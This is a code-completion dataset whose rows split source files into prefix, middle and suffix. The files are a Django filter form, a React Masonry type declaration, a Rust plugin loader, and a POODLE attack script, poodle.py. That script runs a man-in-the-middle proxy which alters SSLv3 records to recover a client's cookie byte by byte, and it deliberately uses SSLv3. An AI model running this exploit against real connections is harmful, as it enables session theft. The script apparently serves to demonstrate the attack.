file_name (large_string, lengths 4–140) | prefix (large_string, lengths 0–12.1k) | suffix (large_string, lengths 0–12k) | middle (large_string, lengths 0–7.51k) | fim_type (large_string, 4 classes)
---|---|---|---|---|
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
| if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion']) | identifier_body |
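Each row of this dataset splits one source file into `prefix`, `middle`, and `suffix` columns (the inline `|` marks the column boundaries), with `fim_type` naming the split strategy. Below is a minimal sketch of how a row reassembles into the original file, or into a fill-in-the-middle training string; the `<fim_*>` sentinel tokens follow the common PSM convention and are an assumption here, since the exact tokens depend on the target model.

```python
# Sketch: rebuild a source file, or a FIM training sample, from one dataset row.
# The <fim_*> sentinel tokens are an assumption (PSM-style formatting); swap in
# whatever tokens the target model actually uses.
def reassemble(row: dict) -> str:
    """Reconstruct the original source file from a row."""
    return row["prefix"] + row["middle"] + row["suffix"]

def to_fim_sample(row: dict) -> str:
    """Format a row as a prefix-suffix-middle (PSM) training string."""
    return ("<fim_prefix>" + row["prefix"]
            + "<fim_suffix>" + row["suffix"]
            + "<fim_middle>" + row["middle"])

# Tiny example mirroring the identifier_name row below:
row = {"prefix": "def bu", "middle": "ildQuery(s", "suffix": "elf, q=None):"}
assert reassemble(row) == "def buildQuery(self, q=None):"
```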
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def bu | elf, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| ildQuery(s | identifier_name |
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False) | def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q | tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
| random_line_split |
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = | if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
| conditional_block |
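All four rows above carry the same Django filter form, whose `filter_by` helper relies on `dict.has_key()` — a Python-2-only method that raises `AttributeError` on Python 3. A sketch of the equivalent check for a modern interpreter follows; `cleaned_data` is a plain dict here to keep the example self-contained, with field names taken from the form above.

```python
# Python 3 replacement for the has_key()-based filter_by helper above.
def filter_by(cleaned_data: dict, field: str) -> bool:
    """True when the field was submitted with a non-empty value."""
    value = cleaned_data.get(field)  # replaces cleaned_data.has_key(field)
    return value is not None and value != ''

cleaned = {'nombre': 'escuela', 'jurisdiccion': None, 'tipo_gestion': ''}
assert filter_by(cleaned, 'nombre')
assert not filter_by(cleaned, 'jurisdiccion')   # None value
assert not filter_by(cleaned, 'tipo_gestion')   # empty string
assert not filter_by(cleaned, 'missing')        # key absent
```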
Masonry.d.ts | import { PureComponent, Validator, Requireable } from 'react';
import { CellMeasurerCacheInterface, KeyMapper, MeasuredCellParent } from './CellMeasurer';
import { GridCellRenderer } from './Grid';
import { IndexRange } from '../../index';
/**
* Specifies the number of milliseconds during which to disable pointer events while a scroll is in progress.
* This improves performance and makes scrolling smoother.
*/ | export type OnCellsRenderedCallback = (params: IndexRange) => void;
export type OnScrollCallback = (params: { clientHeight: number; scrollHeight: number; scrollTop: number }) => void;
export type MasonryCellProps = {
index: number;
isScrolling: boolean;
key: React.Key;
parent: MeasuredCellParent;
style?: React.CSSProperties;
};
export type CellRenderer = (props: MasonryCellProps) => React.ReactNode;
export type MasonryProps = {
autoHeight: boolean;
cellCount: number;
cellMeasurerCache: CellMeasurerCacheInterface;
cellPositioner: Positioner;
cellRenderer: CellRenderer;
className?: string;
height: number;
id?: string;
keyMapper?: KeyMapper;
onCellsRendered?: OnCellsRenderedCallback;
onScroll?: OnScrollCallback;
overscanByPixels?: number;
role?: string;
scrollingResetTimeInterval?: number;
style?: React.CSSProperties;
tabIndex?: number | null;
width: number;
/**
* PLEASE NOTE
* The [key: string]: any; line is here on purpose
* This is due to the need to force re-renders of the PureComponent
* Check the following link if you want to know more
* https://github.com/bvaughn/react-virtualized#pass-thru-props
*/
[key: string]: any;
};
export type MasonryState = {
isScrolling: boolean;
scrollTop: number;
};
/**
* This component efficiently displays arbitrarily positioned cells using windowing techniques.
* Cell position is determined by an injected `cellPositioner` property.
* Windowing is vertical; this component does not support horizontal scrolling.
*
* Rendering occurs in two phases:
* 1) First pass uses estimated cell sizes (provided by the cache) to determine how many cells to measure in a batch.
* Batch size is chosen using a fast, naive layout algorithm that stacks images in order until the viewport has been filled.
* After measurement is complete (componentDidMount or componentDidUpdate) this component evaluates positioned cells
* in order to determine if another measurement pass is required (eg if actual cell sizes were less than estimated sizes).
* All measurements are permanently cached (keyed by `keyMapper`) for performance purposes.
* 2) Second pass uses the external `cellPositioner` to layout cells.
* At this time the positioner has access to cached size measurements for all cells.
* The positions it returns are cached by Masonry for fast access later.
* Phase one is repeated if the user scrolls beyond the current layout's bounds.
* If the layout is invalidated due to eg a resize, cached positions can be cleared using `recomputeCellPositions()`.
*
* Animation constraints:
* Simple animations are supported (eg translate/slide into place on initial reveal).
* More complex animations are not (eg flying from one position to another on resize).
*
* Layout constraints:
* This component supports multi-column layout.
* The height of each item may vary.
* The width of each item must not exceed the width of the column it is "in".
* The left position of all items within a column must align.
* (Items may not span multiple columns.)
*/
export class Masonry extends PureComponent<MasonryProps, MasonryState> {
static defaultProps: {
autoHeight: false;
keyMapper: identity;
onCellsRendered: noop;
onScroll: noop;
overscanByPixels: 20;
role: 'grid';
scrollingResetTimeInterval: typeof DEFAULT_SCROLLING_RESET_TIME_INTERVAL;
style: emptyObject;
tabIndex: 0;
};
clearCellPositions(): void;
// HACK This method signature was intended for Grid
invalidateCellSizeAfterRender(params: { rowIndex: number }): void;
recomputeCellPositions(): void;
static getDerivedStateFromProps(nextProps: MasonryProps, prevState: MasonryState): MasonryState | null;
}
export default Masonry;
export type emptyObject = {};
export type identity = <T>(value: T) => T;
export type noop = () => void;
export type Position = {
left: number;
top: number;
};
export type createCellPositionerParams = {
cellMeasurerCache: CellMeasurerCacheInterface;
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type resetParams = {
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type Positioner = ((index: number) => Position) & {
reset: (params: resetParams) => void;
};
export const createCellPositioner: (params: createCellPositionerParams) => Positioner; | export const DEFAULT_SCROLLING_RESET_TIME_INTERVAL = 150;
| random_line_split |
Masonry.d.ts | import { PureComponent, Validator, Requireable } from 'react';
import { CellMeasurerCacheInterface, KeyMapper, MeasuredCellParent } from './CellMeasurer';
import { GridCellRenderer } from './Grid';
import { IndexRange } from '../../index';
/**
* Specifies the number of miliseconds during which to disable pointer events while a scroll is in progress.
* This improves performance and makes scrolling smoother.
*/
export const DEFAULT_SCROLLING_RESET_TIME_INTERVAL = 150;
export type OnCellsRenderedCallback = (params: IndexRange) => void;
export type OnScrollCallback = (params: { clientHeight: number; scrollHeight: number; scrollTop: number }) => void;
export type MasonryCellProps = {
index: number;
isScrolling: boolean;
key: React.Key;
parent: MeasuredCellParent;
style?: React.CSSProperties;
};
export type CellRenderer = (props: MasonryCellProps) => React.ReactNode;
export type MasonryProps = {
autoHeight: boolean;
cellCount: number;
cellMeasurerCache: CellMeasurerCacheInterface;
cellPositioner: Positioner;
cellRenderer: CellRenderer;
className?: string;
height: number;
id?: string;
keyMapper?: KeyMapper;
onCellsRendered?: OnCellsRenderedCallback;
onScroll?: OnScrollCallback;
overscanByPixels?: number;
role?: string;
scrollingResetTimeInterval?: number;
style?: React.CSSProperties;
tabIndex?: number | null;
width: number;
/**
* PLEASE NOTE
* The [key: string]: any; line is here on purpose
* This is due to the need to force re-renders of the PureComponent
* Check the following link if you want to know more
* https://github.com/bvaughn/react-virtualized#pass-thru-props
*/
[key: string]: any;
};
export type MasonryState = {
isScrolling: boolean;
scrollTop: number;
};
/**
* This component efficiently displays arbitrarily positioned cells using windowing techniques.
* Cell position is determined by an injected `cellPositioner` property.
* Windowing is vertical; this component does not support horizontal scrolling.
*
* Rendering occurs in two phases:
* 1) First pass uses estimated cell sizes (provided by the cache) to determine how many cells to measure in a batch.
* Batch size is chosen using a fast, naive layout algorithm that stacks images in order until the viewport has been filled.
* After measurement is complete (componentDidMount or componentDidUpdate) this component evaluates positioned cells
* in order to determine if another measurement pass is required (eg if actual cell sizes were less than estimated sizes).
* All measurements are permanently cached (keyed by `keyMapper`) for performance purposes.
* 2) Second pass uses the external `cellPositioner` to layout cells.
* At this time the positioner has access to cached size measurements for all cells.
* The positions it returns are cached by Masonry for fast access later.
* Phase one is repeated if the user scrolls beyond the current layout's bounds.
* If the layout is invalidated due to eg a resize, cached positions can be cleared using `recomputeCellPositions()`.
*
* Animation constraints:
* Simple animations are supported (eg translate/slide into place on initial reveal).
* More complex animations are not (eg flying from one position to another on resize).
*
* Layout constraints:
* This component supports multi-column layout.
* The height of each item may vary.
* The width of each item must not exceed the width of the column it is "in".
* The left position of all items within a column must align.
* (Items may not span multiple columns.)
*/
export class | extends PureComponent<MasonryProps, MasonryState> {
static defaultProps: {
autoHeight: false;
keyMapper: identity;
onCellsRendered: noop;
onScroll: noop;
overscanByPixels: 20;
role: 'grid';
scrollingResetTimeInterval: typeof DEFAULT_SCROLLING_RESET_TIME_INTERVAL;
style: emptyObject;
tabIndex: 0;
};
clearCellPositions(): void;
// HACK This method signature was intended for Grid
invalidateCellSizeAfterRender(params: { rowIndex: number }): void;
recomputeCellPositions(): void;
static getDerivedStateFromProps(nextProps: MasonryProps, prevState: MasonryState): MasonryState | null;
}
export default Masonry;
export type emptyObject = {};
export type identity = <T>(value: T) => T;
export type noop = () => void;
export type Position = {
left: number;
top: number;
};
export type createCellPositionerParams = {
cellMeasurerCache: CellMeasurerCacheInterface;
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type resetParams = {
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type Positioner = ((index: number) => Position) & {
reset: (params: resetParams) => void;
};
export const createCellPositioner: (params: createCellPositionerParams) => Positioner;
| Masonry | identifier_name |
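The doc comment in the Masonry rows above describes a two-phase layout: a first pass batches cells using estimated sizes, stacking them in order until the viewport is filled, then a second pass positions them from cached measurements. Below is a rough, language-agnostic sketch of the first-pass batch-size choice; all numbers are hypothetical, and the real component is TypeScript and folds in `overscanByPixels` differently.

```python
# Illustrative only: choose how many cells to measure in the first pass by
# stacking estimated heights into columns until every column overflows the
# viewport, as the Masonry doc comment describes.
def first_pass_batch(estimated_heights, column_count, viewport_height, overscan_px=20):
    columns = [0.0] * column_count            # running height per column
    batch = 0
    for h in estimated_heights:
        shortest = columns.index(min(columns))
        columns[shortest] += h                # naive in-order stacking
        batch += 1
        if min(columns) >= viewport_height + overscan_px:
            break                             # viewport filled: measure this batch
    return batch

print(first_pass_batch([120, 80, 200, 150, 90, 110], column_count=2, viewport_height=300))
```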
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn new(prefix: PathBuf) -> PluginManager {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
}
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
| n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
} | #[cfg(target_os = "windows")]
fn libname(mut n: String) -> String { | random_line_split |
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn new(prefix: PathBuf) -> PluginManager |
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
#[cfg(target_os = "windows")]
fn libname(mut n: String) -> String {
n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
}
| {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
} | identifier_body |
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn | (prefix: PathBuf) -> PluginManager {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
}
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
#[cfg(target_os = "windows")]
fn libname(mut n: String) -> String {
n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
}
| new | identifier_name |
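The three `cfg`-gated `libname()` functions in the plugins.rs rows above map a plugin name to the platform's dynamic-library filename (`name.dll` on Windows, `name.dylib` on macOS, `libname.so` elsewhere) before `DynamicLibrary::open` loads it and resolves the `rustdoc_plugin_entrypoint` symbol. The same mapping, sketched in Python for illustration:

```python
# Sketch of the platform-specific dynamic-library naming used by libname().
import sys

def libname(name: str) -> str:
    """Return the dynamic-library filename for a plugin on this platform."""
    if sys.platform.startswith('win'):
        return name + '.dll'
    if sys.platform == 'darwin':
        return name + '.dylib'
    return 'lib' + name + '.so'

assert libname('foo') in ('foo.dll', 'foo.dylib', 'libfoo.so')
```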
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on its host and port, waiting for the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server.
Inform the attacker about the client's frames and the server's responses.
Finally, relay the data from the client to the server and vice versa.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
|
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str | (plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush() | conditional_block |
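The `decipher` method above encodes the core POODLE observation: SSLv3 checks only the last padding byte, so when the attacker copies a target ciphertext block into the final (padding) block position and the record is accepted, that block's last plaintext byte must have decrypted to `block_len - 1`. Unwinding the CBC XOR chain then yields one plaintext byte. A sketch of that arithmetic, mirroring `decipher`; the byte values below are hypothetical.

```python
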